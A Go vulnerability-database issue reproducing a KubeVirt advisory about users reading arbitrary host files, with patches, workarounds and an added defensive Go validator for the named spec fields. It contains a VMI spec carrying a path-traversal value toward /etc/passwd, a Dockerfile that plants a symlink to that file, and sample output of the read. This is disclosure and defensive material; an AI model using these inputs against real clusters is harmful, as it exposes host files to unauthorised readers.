
x/vulndb: potential Go vuln in kubevirt.io/kubevirt: GHSA-qv98-3369-g364 #1000

Closed
GoVulnBot opened this issue Sep 15, 2022 · 3 comments
Labels: excluded: EFFECTIVELY_PRIVATE (This vulnerability exists in a package that can be imported, but isn't meant to be used outside that module.)


@GoVulnBot

In GitHub Security Advisory GHSA-qv98-3369-g364, there is a vulnerability in the following Go packages or modules:

| Unit | Fixed | Vulnerable Ranges |
| --- | --- | --- |
| kubevirt.io/kubevirt | 0.55.1 | >= 0.20, < 0.55.1 |

See doc/triage.md for instructions on how to triage this report.

modules:
  - module: TODO
    versions:
      - introduced: 0.20.0
        fixed: 0.55.1
    packages:
      - package: kubevirt.io/kubevirt
description: |
  ### Impact

  Users with the permission to create VMIs can construct VMI specs which allow them to read arbitrary files on the host. There are three main attack vectors:

  1. Some path fields on the VMI spec were not properly validated and allowed passing in relative paths which would have been mounted into the virt-launcher pod. The fields are: `spec.domain.firmware.kernelBoot.container.kernelPath`, `spec.domain.firmware.kernelBoot.container.initrdPath` as well as `spec.volumes[*].containerDisk.path`.

  Example:

  ```yaml
  apiVersion: kubevirt.io/v1
  kind: VirtualMachineInstance
  metadata:
    name: vmi-fedora
  spec:
    domain:
      devices:
        disks:
        - disk:
            bus: virtio
          name: containerdisk
        - disk:
            bus: virtio
          name: cloudinitdisk
        - disk:
            bus: virtio
          name: containerdisk1
        rng: {}
      resources:
        requests:
          memory: 1024M
    terminationGracePeriodSeconds: 0
    volumes:
    - containerDisk:
        image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0
      name: containerdisk
    - containerDisk:
        image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0
        path: test3/../../../../../../../../etc/passwd
      name: containerdisk1
    - cloudInitNoCloud:
        userData: |
          #!/bin/sh
          echo 'just something to make cirros happy'
      name: cloudinitdisk
  ```

  2. Instead of passing in relative links on the API, using malicious links in the containerDisk itself can have the same effect:

  ```Dockerfile
  FROM <anybase>
  RUN mkdir -p /etc/ && touch /etc/passwd
  RUN mkdir -p /disks/ && ln -s /etc/passwd /disks/disk.img
  ```

  3. KubeVirt allows PVC hotplugging. The hotplugged PVC is under user control and it is possible to place absolute links there. Since containerDisk and hotplug code use the same mechanism to provide the disk to the virt-launcher pod, it can also be used to do arbitrary host file reads.

  In all three cases it is then possible to at least read any host file:

  ```
  $ sudo cat /dev/vdc
  root:x:0:0:root:/root:/bin/bash
  bin:x:1:1:bin:/bin:/sbin/nologin
  daemon:x:2:2:daemon:/sbin:/sbin/nologin
  adm:x:3:4:adm:/var/adm:/sbin/nologin
  lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  [...]
  ```

  ### Patches

  KubeVirt 0.55.1 provides patches to fix the vulnerability.

  ### Workarounds

  * Ensure that the `HotplugVolumes` feature-gate is disabled
  * ContainerDisk support can't be disabled. The only known way to mitigate this issue is to create, e.g. with a policy controller, a condition template which ensures that no containerDisk gets added and that `spec.domain.firmware.kernelBoot` is not used on VirtualMachineInstances.
  * Ensure that SELinux is enabled. It blocks most attempts to read host files but does not provide a 100% guarantee (like vm-to-vm read may still work).

  ### References

  Disclosure notice from the discovering party: https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm

  ### For more information

  For interested vendors which have to provide a fix for their supported versions, the following PRs are providing the fix:

   * https://github.com/kubevirt/kubevirt/pull/8198
   * https://github.com/kubevirt/kubevirt/pull/8268

  ### Credits
  Oliver Brooks and James Klopchic of NCC Group
  Diane Dubois and Roman Mohr of Google
ghsas:
  - GHSA-qv98-3369-g364

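The two checks a defender would want for the advisory above, as an added Go example that is not KubeVirt's code and does not reproduce the fix in the linked PRs (Go because both KubeVirt and this vulnerability database are Go projects). The `VMISpec`, `KernelBoot`, `ContainerDisk` and `Volume` types are hypothetical stand-ins for the three spec fields the advisory names; `ValidateVMISpec` rejects relative or non-canonical paths in those fields (vector 1), and `ResolveWithinRoot` resolves symlinks under a disk root and refuses any target that escapes it (vectors 2 and 3). The VMI in `main` and the temporary directories are constructed sample input.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// Hypothetical stand-ins for the VMI spec fields named in the advisory;
// these are NOT KubeVirt's API types.
type KernelBoot struct{ KernelPath, InitrdPath string }
type ContainerDisk struct{ Image, Path string }
type Volume struct {
	Name          string
	ContainerDisk *ContainerDisk
}
type VMISpec struct {
	KernelBoot *KernelBoot
	Volumes    []Volume
}

// validateDiskPath accepts only an empty path (image default) or an absolute,
// already-canonical path. Relative paths and anything filepath.Clean rewrites
// (".." segments, "./", doubled separators) are rejected, which covers the
// "test3/../../../../etc/passwd" form of vector 1.
func validateDiskPath(field, p string) error {
	if p == "" {
		return nil
	}
	if !filepath.IsAbs(p) {
		return fmt.Errorf("%s: %q must be an absolute path", field, p)
	}
	if clean := filepath.Clean(p); clean != p {
		return fmt.Errorf("%s: %q is not canonical (cleans to %q)", field, p, clean)
	}
	return nil
}

// ValidateVMISpec runs validateDiskPath over the three fields from the advisory
// and returns every violation so an admission check can report them all.
func ValidateVMISpec(spec VMISpec) []error {
	var errs []error
	add := func(field, p string) {
		if err := validateDiskPath(field, p); err != nil {
			errs = append(errs, err)
		}
	}
	if kb := spec.KernelBoot; kb != nil {
		add("spec.domain.firmware.kernelBoot.container.kernelPath", kb.KernelPath)
		add("spec.domain.firmware.kernelBoot.container.initrdPath", kb.InitrdPath)
	}
	for i, v := range spec.Volumes {
		if v.ContainerDisk != nil {
			add(fmt.Sprintf("spec.volumes[%d].containerDisk.path", i), v.ContainerDisk.Path)
		}
	}
	return errs
}

// ResolveWithinRoot handles vectors 2 and 3: the path may be syntactically fine
// but be a symlink planted in the image or on a hotplugged PVC. Every symlink is
// resolved and the final target must still lie under root.
func ResolveWithinRoot(root, diskPath string) (string, error) {
	absRoot, err := filepath.EvalSymlinks(root)
	if err != nil {
		return "", err
	}
	target, err := filepath.EvalSymlinks(filepath.Join(absRoot, diskPath))
	if err != nil {
		return "", err
	}
	rel, err := filepath.Rel(absRoot, target)
	if err != nil {
		return "", err
	}
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", fmt.Errorf("%q resolves to %q, outside %q", diskPath, target, absRoot)
	}
	return target, nil
}

func main() {
	// Constructed sample mirroring the advisory's VMI: one sane containerDisk
	// and one whose path climbs out of the image.
	spec := VMISpec{Volumes: []Volume{
		{Name: "containerdisk", ContainerDisk: &ContainerDisk{Image: "example/disk:v1"}},
		{Name: "containerdisk1", ContainerDisk: &ContainerDisk{
			Image: "example/disk:v1", Path: "test3/../../../../../../../../etc/passwd"}},
	}}
	for _, err := range ValidateVMISpec(spec) {
		fmt.Println("reject:", err)
	}
	// Constructed symlink scenario: the disk root contains disk.img -> a file outside it.
	root, _ := os.MkdirTemp("", "diskroot")
	outside, _ := os.MkdirTemp("", "host")
	defer os.RemoveAll(root)
	defer os.RemoveAll(outside)
	os.WriteFile(filepath.Join(outside, "secret"), []byte("x"), 0o600)
	os.Symlink(filepath.Join(outside, "secret"), filepath.Join(root, "disk.img"))
	if _, err := ResolveWithinRoot(root, "/disk.img"); err != nil {
		fmt.Println("reject:", err)
	}
}
```

`ResolveWithinRoot` is a point-in-time check: a link that is replaced after validation, which is realistic on a hotplugged PVC the advisory describes as user-controlled, is not caught, so it complements rather than replaces the advisory's other workarounds (disabling `HotplugVolumes`, a policy controller that forbids containerDisk and kernelBoot, and SELinux).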
@neild neild added the label excluded: EFFECTIVELY_PRIVATE (This vulnerability exists in a package that can be imported, but isn't meant to be used outside that module.) and removed the NeedsTriage label on Sep 20, 2022
@gopherbot
Contributor

Change https://go.dev/cl/432217 mentions this issue: data/excluded: add GO-2022-1000.yaml for GHSA-qv98-3369-g364

@gopherbot
Contributor

Change https://go.dev/cl/592774 mentions this issue: data/reports: unexclude 50 reports

@gopherbot
Contributor

Change https://go.dev/cl/607230 mentions this issue: data/reports: unexclude 20 reports (28)

gopherbot pushed a commit that referenced this issue Aug 21, 2024
  - data/reports/GO-2022-0985.yaml
  - data/reports/GO-2022-0986.yaml
  - data/reports/GO-2022-0987.yaml
  - data/reports/GO-2022-0989.yaml
  - data/reports/GO-2022-0995.yaml
  - data/reports/GO-2022-1000.yaml
  - data/reports/GO-2022-1006.yaml
  - data/reports/GO-2022-1014.yaml
  - data/reports/GO-2022-1015.yaml
  - data/reports/GO-2022-1019.yaml
  - data/reports/GO-2022-1021.yaml
  - data/reports/GO-2022-1023.yaml
  - data/reports/GO-2022-1029.yaml
  - data/reports/GO-2022-1032.yaml
  - data/reports/GO-2022-1033.yaml
  - data/reports/GO-2022-1060.yaml
  - data/reports/GO-2022-1062.yaml
  - data/reports/GO-2022-1065.yaml
  - data/reports/GO-2022-1066.yaml
  - data/reports/GO-2022-1067.yaml

Updates #985
Updates #986
Updates #987
Updates #989
Updates #995
Updates #1000
Updates #1006
Updates #1014
Updates #1015
Updates #1019
Updates #1021
Updates #1023
Updates #1029
Updates #1032
Updates #1033
Updates #1060
Updates #1062
Updates #1065
Updates #1066
Updates #1067

Change-Id: I27b6f79e1898a13040a758a71348464c5e7c72a9
Reviewed-on: https://go-review.googlesource.com/c/vulndb/+/607230
Auto-Submit: Tatiana Bradley <tatianabradley@google.com>
LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
Reviewed-by: Damien Neil <dneil@google.com>
Commit-Queue: Tatiana Bradley <tatianabradley@google.com>